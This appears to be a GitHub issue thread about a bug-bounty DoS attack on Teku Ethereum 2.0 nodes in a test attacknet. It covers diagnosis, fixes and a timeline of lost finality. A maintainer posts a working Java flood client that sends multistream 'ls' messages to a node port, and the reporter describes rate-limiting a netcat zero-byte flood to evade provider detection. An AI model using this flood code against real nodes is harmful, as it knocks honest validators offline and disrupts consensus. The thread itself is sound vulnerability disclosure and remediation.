Closed jrhea closed 3 years ago
Very interesting, finality could break easily on eth 2.0 😂
Very interesting, finality could break easily on eth 2.0 😂
I'm confident that the Teku team will be able to fix this particular issue. Keep in mind that this was a 4 node network so taking two nodes down took much less effort and coordination than a 1000+ node production mainnet.
Keep in mind that this was a 4 node network so taking two nodes down took much less effort and coordination than a 1000+ node production mainnet.
Why not :) https://cointelegraph.com/news/ethereum-network-overcame-intentional-attack-affecting-parity-nodes
Keep in mind that this was a 4 node network so taking two nodes down took much less effort and coordination than a 1000+ node production mainnet.
Why not :) https://cointelegraph.com/news/ethereum-network-overcame-intentional-attack-affecting-parity-nodes
Not impossible...just saying it's not necessarily going to be as easy as this. 🙂
Apologies, I should have been posting updates here on progress to address this. The multistream protocol has a length prefix for each method. Since the message is a stream of 0s this winds up being interpreted as a unique message per byte sent. The messages are all invalid as they should end with \n
and don't match any supported protocols so all wind up being rejected. jvm-libp2p is responding to each byte with a na
response.
However that causes a couple of issues. Firstly responding to one byte with multiple bytes is a vector for various amplification attacks but that wasn't the issue that caused the loss of finality. The second issue is that the na
responses were being written faster than they were read by the attacking peer and jvm-libp2p was not applying any throttling. Eventually TCP back pressure kicked in, filling up the OS write buffers and the responses wound up being queued in user space memory. This pushed up both the on and off heap memory usage very substantially. CPU also spiked significantly partly due to processing all those multi stream "messages" but mostly because of the resultant memory pressure and GC activity.
Preventing this specific attack is straight-forward, disconnect the peer immediately when an invalid (e.g. 0 length) multi stream message is received. https://github.com/libp2p/jvm-libp2p/pull/126 implements that for jvm-libp2p. The jvm-libp2p update hasn't been pulled into Teku yet as there are still more fixes required.
Specifically, it's possible to trigger this attack using valid multi stream messages and do so even more efficiently by not reading the input stream while attacking at all. For example:
public static void main(String[] args) throws Exception {
final String host = "127.0.0.1";
final int port = 4002;
try (final Socket socket = new Socket(host, port);
final OutputStream out = socket.getOutputStream()) {
send(out, "/multistream/1.0.0");
while (true) {
send(out, "ls");
}
} catch (final Exception e) {
throw e;
}
}
private static void send(final OutputStream out, final String cmd) throws IOException {
out.write(getCommandBytes(cmd + "\n"));
out.flush();
}
private static byte[] getCommandBytes(final String s) {
final byte[] noise = s.getBytes(StandardCharsets.UTF_8);
return Bytes.wrap(Bytes.of((byte) noise.length), Bytes.wrap(noise)).toArray();
}
This turns out to be much more efficient than the original attack. This is a surprisingly common problem with netty, which jvm-libp2p uses internally, due to the particular details of it's async IO model. There will need to be a few changes made and further investigations done to ensure that the higher level req/resp responses aren't negatively affected but an initial start on fixing this category of vulnerability is https://github.com/PegaSysEng/teku/pull/2478/ Netty's user space write buffers are significantly reduced and inputs are no longer read until existing output can be written. Additionally connections are disconnected when the write buffer remains full for too long. With these changes the multistream level attack is very effectively mitigated.
We are continuing to work our way through the whole stack checking for similar points of vulnerability and any potential unintended side-effects of the write buffer tunings.
Given we are in a phase of testing and development without a production beacon chain being deployed, we're focussing on a slow and steady approach to work through not just this issue but as many of the issue in the same or similar category that we can.
Plausible liveness doesn’t work in ETH 2.0
@astrixial I'm not sure your comment really aligns with what this issue is about. In any consensus algorithm if all the nodes are shut down it will not finalise anything. We're currently in a phase of improving the robustness of clients against deliberate attacks to take them offline and doing so with a network containing only 4 nodes (all running the same software). Resilience to DOS attacks increases significantly as you increase the number of nodes and diversity of clients, locations and network connections (and also as you harden individual clients against attacks which we're also doing).
Great work @jrhea! This qualifies for the $5k beta-0 teku attacknet bounty!
Thank you @ajsutton for your work in diagnosing and fixing the vector :)
The fix for this attack and my more efficient version has now been merged into Teku. We've also throttled the responses we send for libp2p req/resp requests to avoid queuing too much data so that we only load and send the next block after the first has been successfully written to the OS write buffer.
@ajsutton https://github.com/PegaSysEng/teku/pull/2486 this is the fix right? could you perhaps confirm that @jrhea's exploit doesn't work on latest Teku master?
@gakonst https://github.com/PegaSysEng/teku/pull/2478 is the most critical piece to prevent the write buffer growing out of control. There's also a fix in jvm-libp2p to disconnect on invalid messages: https://github.com/libp2p/jvm-libp2p/pull/126
The PR you mention is a follow up which I'm not sure was actually necessary to avoid DOS attacks but does make it less likely that a peer on a slow connection gets disconnected when they are operating honestly just because we can write blocks faster than they can read.
@jrhea's exploit and the variants of it that I identified do not work on latest Teku master.
Description
Teku nodes are vulnerable to a simple DoS attack that prevents them from participating in consensus.
Attack scenario
Two of four Teku nodes were targeted by five ordinary machines with a sustained DoS attack. Initial loss of finality was achieved with two or three machines, but the others joined within a few epochs to ensure that the network could not recover.
Impact
The effect that the DoS attack had on the attacknet was a prolonged loss finality and required manual intervention to restore the network to a healthy state once the attack stopped. The nodes under attack used large amounts of memory, were subject to multiple container restarts, had trouble staying connected to peers and one node's local clock was 20 mins slow.
Details
How the attack was implemented
This is the command that the five machines ran to prevent finality on the attacknet:
What the command does is pipe
0x00
from/dev/zero
in the pv command which rate limits to a (somewhat aribrary) value high enough to prevent finality, but stay off AWS/ISP radars to ensure the attack continues. The data is then piped into the netcat command which sends it to the nodes under attack. The while loop is there for when it loses connectivity and the command completes due to container restarts.Here is a snippet of the output from one of the machines attacking the network:
You can see the attacking machine lose connection to the node as it restarts - this is when the while loop kicks in and keeps trying to reconnect.
Attack log
Epoch 407, Slot 13038
Is the first time the network missed block. At this point, I was still tweaking the command parameters and working out how to keep the attack going in the event that the TCP connection fails. Here is the output from a node I had monitoring the network:
Epoch 413
Two AWS t2.small machines begin the DoS attack on
13.114.37.176
and35.175.180.94
. You can see the peer count begin to drop and several skipped slots.Epoch 414
This is the first time the chain fails to finalize and there are three machines attacking the network - two t2 small's and one Macbook.
Epoch 416 - 417
I added a second Macbook Pro to the attack in epoch 416 and by the end of epoch 417 (15:59 specifically), there were a total of five machines participating - two t2 small's and three Macbooks.
Epoch 420
The network manages to justify epoch 417 (up from 412), but finality is still prevented.
Epoch 428 Slot: 13700
Finality is prevented for the required 16 epochs and the attack officially stops after slot 13700.
Epoch 433
The network hasn't been attacked for several epochs and manages to recover enough to justify epoch 430.
Epoch 444 - 445
The network finaly recovers and finality is restored.